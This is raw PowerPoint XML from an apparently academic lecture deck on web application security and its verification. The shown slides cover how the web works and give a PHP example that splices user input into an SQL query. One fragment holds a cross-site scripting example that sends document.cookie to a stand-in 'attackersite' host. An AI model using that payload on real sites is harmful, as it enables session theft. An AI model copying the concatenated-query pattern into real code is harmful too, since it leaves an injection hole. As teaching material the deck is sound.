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56"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId57"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="377" r:id="rId3"/>
    <p:sldId id="385" r:id="rId4"/>
    <p:sldId id="322" r:id="rId5"/>
    <p:sldId id="395" r:id="rId6"/>
    <p:sldId id="275" r:id="rId7"/>
    <p:sldId id="396" r:id="rId8"/>
    <p:sldId id="397" r:id="rId9"/>
    <p:sldId id="405" r:id="rId10"/>
    <p:sldId id="276" r:id="rId11"/>
    <p:sldId id="334" r:id="rId12"/>
    <p:sldId id="337" r:id="rId13"/>
    <p:sldId id="398" r:id="rId14"/>
    <p:sldId id="399" r:id="rId15"/>
    <p:sldId id="403" r:id="rId16"/>
    <p:sldId id="347" r:id="rId17"/>
    <p:sldId id="332" r:id="rId18"/>
    <p:sldId id="402" r:id="rId19"/>
    <p:sldId id="404" r:id="rId20"/>
    <p:sldId id="335" r:id="rId21"/>
    <p:sldId id="338" r:id="rId22"/>
    <p:sldId id="339" r:id="rId23"/>
    <p:sldId id="340" r:id="rId24"/>
    <p:sldId id="341" r:id="rId25"/>
    <p:sldId id="342" r:id="rId26"/>
    <p:sldId id="343" r:id="rId27"/>
    <p:sldId id="344" r:id="rId28"/>
    <p:sldId id="345" r:id="rId29"/>
    <p:sldId id="346" r:id="rId30"/>
    <p:sldId id="348" r:id="rId31"/>
    <p:sldId id="353" r:id="rId32"/>
    <p:sldId id="388" r:id="rId33"/>
    <p:sldId id="394" r:id="rId34"/>
    <p:sldId id="390" r:id="rId35"/>
    <p:sldId id="391" r:id="rId36"/>
    <p:sldId id="392" r:id="rId37"/>
    <p:sldId id="393" r:id="rId38"/>
    <p:sldId id="324" r:id="rId39"/>
    <p:sldId id="355" r:id="rId40"/>
    <p:sldId id="279" r:id="rId41"/>
    <p:sldId id="303" r:id="rId42"/>
    <p:sldId id="359" r:id="rId43"/>
    <p:sldId id="360" r:id="rId44"/>
    <p:sldId id="372" r:id="rId45"/>
    <p:sldId id="315" r:id="rId46"/>
    <p:sldId id="384" r:id="rId47"/>
    <p:sldId id="382" r:id="rId48"/>
    <p:sldId id="383" r:id="rId49"/>
    <p:sldId id="387" r:id="rId50"/>
    <p:sldId id="349" r:id="rId51"/>
    <p:sldId id="327" r:id="rId52"/>
    <p:sldId id="350" r:id="rId53"/>
    <p:sldId id="320" r:id="rId54"/>
    <p:sldId id="321" r:id="rId55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330" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="891" y="2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54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presProps" Target="presProps.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyle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2016/12/7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2016/12/7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30275" y="741363"/>
            <a:ext cx="4937125" cy="370205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DA2D7-307D-4608-850F-618728A36ADE}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16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CA0F04-902F-4631-A1FE-D429CEDCA954}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17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CA0F04-902F-4631-A1FE-D429CEDCA954}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18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53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SDM 2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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2016: Web Application Security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SDM 2016: Web Application Security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53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SDM 2016: Web Application Security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://attackersite/collect.cgi?cookie=+document.cookie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jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.w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1" y="1412776"/>
            <a:ext cx="7330008" cy="216024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TW" sz="4800" dirty="0" smtClean="0"/>
              <a:t>Web Application Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" dirty="0" smtClean="0"/>
              <a:t>and Its Verification</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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168" y="4005064"/>
            <a:ext cx="6553200" cy="266429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zh-TW" sz="2400" b="1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400" b="1" dirty="0" smtClean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endParaRPr lang="zh-TW" altLang="en-US" sz="24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Caveats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Concern only with security problems resulted from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>program defects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> (errors or bad practices)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Will mostly assume using PHP, though there are many languages for programming the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>General interpretation of “Verification”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Testing and simulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Formal verification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Static analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Model checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Theorem proving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Manual code review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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Common Vulnerabilities and Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Objectives and Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>References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 bwMode="auto">
          <a:xfrm>
            <a:off x="357190" y="1571612"/>
            <a:ext cx="2714644" cy="3786214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How the Web Works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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5572164" y="1571612"/>
            <a:ext cx="2143140" cy="3786214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11" name="圓角矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="928662" y="1357298"/>
            <a:ext cx="1571636" cy="428628"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Client side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12" name="圓角矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5857884" y="1357298"/>
            <a:ext cx="1500230" cy="428628"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>S</a:t>
            </a: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erver</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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 </a:t>
            </a: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side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pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\j0292020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084" y="2786058"/>
            <a:ext cx="1656056" cy="1571636"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2143140" y="3071810"/>
            <a:ext cx="857256" cy="121444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sq" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr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1600" dirty="0" smtClean="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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rowser</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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500066" y="4214818"/>
            <a:ext cx="857256" cy="49054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sq" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr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1600" dirty="0" smtClean="0"/>
              <a:t>User</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\8TP1D6DL\MCj0428971000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54" y="2428868"/>
            <a:ext cx="1571636" cy="2297373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直線單箭頭接點 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3000396" y="3286124"/>
            <a:ext cx="2857520" cy="1588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1" name="直線單箭頭接點 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="3000396" y="3643314"/>
            <a:ext cx="2786082" cy="1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 bwMode="auto">
          <a:xfrm>
            <a:off x="3214710" y="2928934"/>
            <a:ext cx="2286016" cy="285752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400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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equest for a Web page</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\OPQ38D2B\MCj0431582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6982618">
            <a:off x="6092783" y="3235271"/>
            <a:ext cx="1081375" cy="1081375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="矩形 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7429520" y="2928934"/>
            <a:ext cx="1643074" cy="1928826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sz="1400" dirty="0" smtClean="0"/>
              <a:t>Retrieve/generate the page, possibly using data from the database and adding client-side scripts to enrich functionalities</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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3" name="矩形 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3214678" y="3714752"/>
            <a:ext cx="2286016" cy="428628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1400" dirty="0" smtClean="0"/>
              <a:t>Delivery of t</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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he</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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 page in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400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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 + scripts</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="Picture 7" descr="C:\Documents and Settings\User\Local Settings\Temporary Internet Files\Content.IE5\OPQ38D2B\MCj0431582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71670" y="3929066"/>
            <a:ext cx="914286" cy="914286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="矩形 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1857356" y="4786322"/>
            <a:ext cx="1357322" cy="1214446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sz="1400" dirty="0" smtClean="0"/>
              <a:t>Display the page and execute client-side scripts on the page </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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6" name="矩形 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1214414" y="2571744"/>
            <a:ext cx="1357322" cy="571504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en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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nteract with the</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW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 browser</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW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7" name="橢圓 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4071934" y="2428868"/>
            <a:ext cx="428628" cy="428628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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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8" name="橢圓 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001024" y="2643182"/>
            <a:ext cx="428628" cy="428628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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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9" name="橢圓 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4071934" y="4214818"/>
            <a:ext cx="428628" cy="428628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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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0" name="橢圓 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3214678" y="5000636"/>
            <a:ext cx="428628" cy="428628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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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1" name="橢圓 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1643042" y="2143116"/>
            <a:ext cx="428628" cy="428628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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-TW" altLang="en-US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29" name="文字方塊 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571472" y="6143644"/>
            <a:ext cx="780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Note: cookies or the equivalent are typically used for maintaining sessions.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Web Applications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i="1" dirty="0" smtClean="0"/>
              <a:t>Web applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> refer mainly to the application programs running on the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Part of a Web application may run on the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Together, they make the Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interactive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>convenient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>versatile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Online activities enabled by Web applications:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Hotel/transportation reservation,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Banking, social networks, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>As required by these activities, Web applications  often involve user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>private and confidential data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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Web Applications: Dynamic Contents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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文字方塊 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000132" y="1142984"/>
            <a:ext cx="7000892" cy="535785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altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$link =  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>localhost’,‘username’,‘password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>’);  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>connect to database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$db =  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_select_db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dbname’,$link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fixInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>();  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>invoke a user-defined function to sanitize all inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$user=$_POST[‘account’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>// fetch and display account information</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$query="SELECT id, name, description  FROM project WHERE  	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user_account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=‘ ".$user.“ ‘ " ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>query_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
